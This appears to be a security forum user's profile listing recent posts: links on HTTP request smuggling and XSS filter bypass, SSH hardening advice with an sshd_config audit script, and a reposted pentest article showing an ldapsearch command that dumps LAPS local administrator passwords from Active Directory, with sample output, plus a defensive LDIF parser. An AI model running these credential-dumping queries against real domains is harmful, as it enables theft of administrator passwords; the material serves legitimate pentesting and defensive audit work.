About SirGod
  1. Author: Soroush Dalili Description: This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks. Slides: https://www.slideshare.net/SoroushDalili/a-forgotten-http-invisibility-cloak
  2. Content Writer

    Keep the forum's profile in mind when you post ads. This is not OLX.
  3. SAML Raider - SAML2 Burp Extension

    The plugin is in the BApp Store, so it has been validated by the Burp people. It can be downloaded directly from there. If not, the source is available for inspection. Anyway, the plugin is very good, it saves you a lot of manual work.
  4. JWT cracker

    Good for the cases where the key is a string. If it is an RSA key, tough luck. @TheTime an alternative to the one written in C#.
  5. Cracked screen on a Samsung Galaxy Note 3, data recovery

    Exactly as you were told above. You can transfer them with ADB (adb pull /director). https://www.howtogeek.com/125769/how-to-install-and-use-abd-the-android-debug-bridge-utility/
  6. Where do you keep your photos?

    A password-protected archive (and stop modifying them) on Google Drive, OneDrive, Dropbox or whatever else you like.
  7. XSS Filters Bypass

    Tutorial on bypassing XSS filters, in two parts (for now). The first one covers generic things (hex, control characters, octal): http://blog.rakeshmane.com/2016/11/xssing-web-part-1.html The second one focuses on Unicode (UTF-8, UTF-16, UTF-32, BOM): http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
  8. "inurl: *.site.com" in the 21st century. https://github.com/fathom6/2017-BSidesLV-Modern-Recon/blob/master/Modern Internet Scale Reconnaisance.pdf
  9. Android app "Transmisii celulare" (Cell broadcasts)

    It looks like an app that lets you configure the messages you can receive from the operator in case of alerts. For example, in case of an earthquake, a message (not an SMS) is sent to all users in that area. Read https://en.wikipedia.org/wiki/Cell_Broadcast You can also look up information about service messages. If you want to get rid of it (I don't see why), since it is a proprietary Huawei app already baked into their Android, a factory reset won't help you. Flash a custom ROM.
  10. The PDFs for the Blackhat 2017 presentations: https://media.defcon.org/DEF CON 25/DEF CON 25 presentations/
  11. Here is also the article that goes with the exploit, with details for those interested: http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
  12. Someone is trying to break into my server

    A few suggestions (not all of them are necessary, only if you are paranoid):
    - PermitRootLogin no
    - Non-standard username (avoid admin, system, etc.)
    - Non-standard port (maybe even in the dynamic port range)
    - Fail2Ban
    - SSH authentication with keys
    - Firewall (open the SSH port only to one IP, if you have a static IP)
    - Two-step SSH authentication (two-factor auth)
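    The sshd_config side of that list can be checked mechanically. The script below is an added example, not code from the post or from OpenSSH: it parses a (constructed) sshd_config the way sshd does, taking the first value of each keyword and falling back to the OpenSSH defaults, and reports which of the suggested settings are missing. The username, Fail2Ban and firewall items are outside sshd_config, so they are not covered; the `AllowUsers` and `AuthenticationMethods` checks are the config-level expression of the "non-standard user" and "two-factor" suggestions, which is an assumption of this example.

```python
"""Audit an sshd_config against the hardening suggestions in the post.

Added example. Both config texts below are constructed samples, not a
real server's configuration.
"""
import re

# Constructed: a stock-looking sshd_config with the weak settings left in.
WEAK_CONFIG = """\
# constructed sample sshd_config (weak)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
#ChallengeResponseAuthentication no
"""

# Constructed: the same server after applying the suggestions.
HARDENED_CONFIG = """\
# constructed sample sshd_config (hardened)
Port 49221
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AuthenticationMethods publickey,keyboard-interactive
AllowUsers ops-deploy
"""

# OpenSSH defaults used when a keyword is absent (assumed OpenSSH 7.x or later).
DEFAULTS = {
    "port": "22",
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
}


def parse_sshd_config(text):
    """Return {keyword_lowercase: value}, keeping the FIRST value per keyword.

    sshd itself uses the first obtained value for each keyword, so a later
    duplicate does not override an earlier one. Match blocks are not handled.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Keywords are case-insensitive; "Keyword value" or "Keyword=value".
        parts = re.split(r"\s+|=", line, maxsplit=1)
        if len(parts) != 2:
            continue
        settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def audit(text):
    """Return a list of (check_name, passed, observed_value) tuples."""
    s = parse_sshd_config(text)
    get = lambda k: s.get(k, DEFAULTS.get(k, "(unset)"))
    methods = [m.strip() for m in s.get("authenticationmethods", "").split(",") if m.strip()]
    return [
        ("PermitRootLogin no", get("permitrootlogin") == "no", get("permitrootlogin")),
        ("non-standard Port", get("port") != "22", get("port")),
        ("PasswordAuthentication no", get("passwordauthentication") == "no",
         get("passwordauthentication")),
        ("PubkeyAuthentication yes", get("pubkeyauthentication") == "yes",
         get("pubkeyauthentication")),
        # Two factors: a key plus a second interactive method (e.g. a PAM/OTP module).
        ("AuthenticationMethods requires two factors",
         len(methods) >= 2 and "publickey" in methods, ",".join(methods) or "(unset)"),
        ("AllowUsers restricts logins", "allowusers" in s, s.get("allowusers", "(unset)")),
    ]


def failed_checks(text):
    """Names of the checks that did not pass, in audit order."""
    return [name for name, ok, _ in audit(text) if not ok]


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {label} ==")
        for name, ok, observed in audit(cfg):
            print(f"  [{'ok' if ok else 'FAIL'}] {name}: {observed}")
```

    Running it prints a pass/fail line per check for both samples; on a real host, feed it the contents of /etc/ssh/sshd_config and verify afterwards with `sshd -T`, which prints the effective configuration including Match blocks that this parser ignores.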
  13. Author: ROB 'MUBIX' FULLER
    Source: https://room362.com/post/2017/dump-laps-passwords-with-ldapsearch/

    If you've ever been pentesting an organization that had LAPS, you know that it is the best solution for randomizing local administrator passwords on the planet. (You should just be leaving them disabled). LAPS stores its information in Active Directory:

    The expiration time:

        ms-Mcs-AdmPwdExpirationTime: 131461867015760024

    And the actual password in clear text:

        ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(

    When LAPS first came out, any user in Active Directory could read it. Microsoft fixed that, you now have to have the All extended rights permission to the object or Full Control of it. In many organizations, there are pockets of OU admins, or even standard users that are in charge of a specific set of Users and (in particular) computers in which they have full control over.

    There is already a Metasploit module thanks to Meatballs: https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_laps.rb. But, unfortunately I don't always have access to a Meterpreter session to run the module. Using ldapsearch (which is included in the package ldapscripts on Debian/Ubuntu) can be used to make the same query that the module does. Here is an example run:

        ldapsearch -x -h -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" \
            "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

    Let's break this down:
    - -x - Use basic authentication
    - -h - Connect to the Domain Controller for ldap
    - -D "helpdesk" -w ASDqwe123 - Login as the helpdesk user, with the password ASDqwe123
    - -b "dc=sittingduck,dc=info" - This loads the base LDAP object of the entire domain.
    - "(ms-MCS-AdmPwd=*)" - Filter out any objects that I can't see a value for ms-MCS-AdmPwd for. (If you have rights as that user to see even one Administrator password, this will show it.)
    - ms-MCS-AdmPwd - Only show me the ms-MCS-AdmPwd object (which by default includes the object name and DN so you will still know what host it belongs to)

    What does that look like?

        $ ldapsearch -x -h -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
        # extended LDIF
        #
        # LDAPv3
        # base <dc=sittingduck,dc=info> with scope subtree
        # filter: (ms-MCS-AdmPwd=*)
        # requesting: ms-MCS-AdmPwd
        #

        # DC1, Domain Controllers, sittingduck.info
        dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info
        ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F

        # SDCLIENT_DAWIN7, LabComputers, Lab, sittingduck.info
        dn: CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
        ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR

        # SD_WSUS_2012, LabComputers, Lab, sittingduck.info
        dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
        ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T

        # WIN-PM0ID6F0AHN, LabComputers, Lab, sittingduck.info
        dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
        ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(

        # search reference
        ref: ldap://research.sittingduck.info/DC=research,DC=sittingduck,DC=info

        # search reference
        ref: ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,DC=info

        # search reference
        ref: ldap://DomainDnsZones.sittingduck.info/DC=DomainDnsZones,DC=sittingduck,DC=info

        # search reference
        ref: ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info

        # search result
        search: 2
        result: 0 Success

    Now, just having the local admin password doesn't ensure that it's enabled, but there is a good bet that you are good to go now.

    P.S. You can also authenticate using Kerberos (think Golden/Silver tickets)

    P.P.S Because Windows doesn't (to the best of my knowledge) require signing on Domain Controllers for LDAP connections yet (probably does in 2016 or will soon), with a little bit of coding you can get ntlmrelayx to dump LAPS passwords ;-)
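    The same query is also the quickest way for a defender to audit LAPS exposure: run it as each non-admin account or service account that has delegated rights over an OU, and the expected result is zero entries. The script below is an added example, not code from the article or from the LAPS tooling: it parses the LDIF that ldapsearch prints (a constructed sample in the same shape as the output above, with made-up password values), lists which computer objects exposed ms-Mcs-AdmPwd to the account used for the query, and converts ms-Mcs-AdmPwdExpirationTime from its Windows FILETIME encoding (100 ns ticks since 1601-01-01 UTC) so passwords that are past their rotation date stand out. The `now` parameter and the host/attribute names in the sample are assumptions of this example.

```python
"""Turn ldapsearch LDIF output for the LAPS attributes into an exposure report.

Added example. SAMPLE_LDIF is a constructed input in the shape of the
ldapsearch output above; the password values are placeholders.
"""
import base64
from datetime import datetime, timedelta, timezone

SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <dc=sittingduck,dc=info> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd ms-MCS-AdmPwdExpirationTime
#

# DC1, Domain Controllers, sittingduck.info
dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: PLACEHOLDER-PASSWORD-1
ms-Mcs-AdmPwdExpirationTime: 131461867015760024

# SD_WSUS_2012, LabComputers, Lab, sittingduck.info
dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: PLACEHOLDER-PASSWORD-2
ms-Mcs-AdmPwdExpirationTime: 130000000000000000

# search reference
ref: ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info

# search result
search: 2
result: 0 Success
"""

# FILETIME counts 100 ns intervals from this epoch.
WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_ldif(text):
    """Return a list of {attr_lowercase: [values]} dicts, one per entry with a dn.

    Handles LDIF folding (continuation lines start with one space), comments,
    and base64 values ("attr:: <b64>"). Attribute names are case-insensitive,
    so ms-MCS-AdmPwd and ms-Mcs-AdmPwd land in the same key.
    """
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]          # unfold continuation line
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:             # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        key, _, value = line.partition(":")
        value = value.strip()
        if value.startswith(":"):         # "attr:: base64" form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(key.strip().lower(), []).append(value)
    return [e for e in entries if "dn" in e]


def filetime_to_datetime(value):
    """Convert a Windows FILETIME string (100 ns ticks since 1601-01-01) to UTC."""
    return WINDOWS_EPOCH + timedelta(microseconds=int(value) // 10)


def laps_exposure(text, now=None):
    """Report every entry whose ms-Mcs-AdmPwd was readable by the querying account."""
    now = now or datetime.now(timezone.utc)
    report = []
    for entry in parse_ldif(text):
        if "ms-mcs-admpwd" not in entry:
            continue
        dn = entry["dn"][0]
        rdn = dn.split(",")[0]
        host = rdn[3:] if rdn.upper().startswith("CN=") else rdn
        raw_exp = entry.get("ms-mcs-admpwdexpirationtime", [None])[0]
        expires = filetime_to_datetime(raw_exp) if raw_exp else None
        report.append({
            "host": host,
            "dn": dn,
            "expires": expires,
            "expired": bool(expires and expires < now),   # rotation overdue
        })
    return report


def exposed_hosts(text, now=None):
    """Host names whose LAPS password the query returned; should be empty for non-admins."""
    return [r["host"] for r in laps_exposure(text, now)]


if __name__ == "__main__":
    for r in laps_exposure(SAMPLE_LDIF):
        when = r["expires"].isoformat() if r["expires"] else "unknown"
        print(f"{r['host']:<16} expires {when}  {'OVERDUE' if r['expired'] else ''}")
```

    Pipe the real ldapsearch output into `parse_ldif` via `sys.stdin.read()` instead of SAMPLE_LDIF; any host listed for a non-administrative account is a delegation that needs to be reviewed, and an "OVERDUE" expiration means the LAPS client on that host has not rotated the password on schedule.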
  14. There is also a more useful example, with meterpreter shellcode: https://gist.github.com/Arno0x/1862c9ff7e7138fc3d82eeaa5d530cfe
  15. The Mozilla folks had a security audit done on Firefox Accounts. The audit was done by Cure53 (yes, including Mario Heiderich). Details: https://blog.mozilla.org/security/2017/07/18/web-service-audits-firefox-accounts/ Full report: https://blog.mozilla.org/security/files/2017/07/FXA-01-report.pdf A clean, informative report, with current vulnerabilities (for those fed up with ../../etc/passwd and order by 5).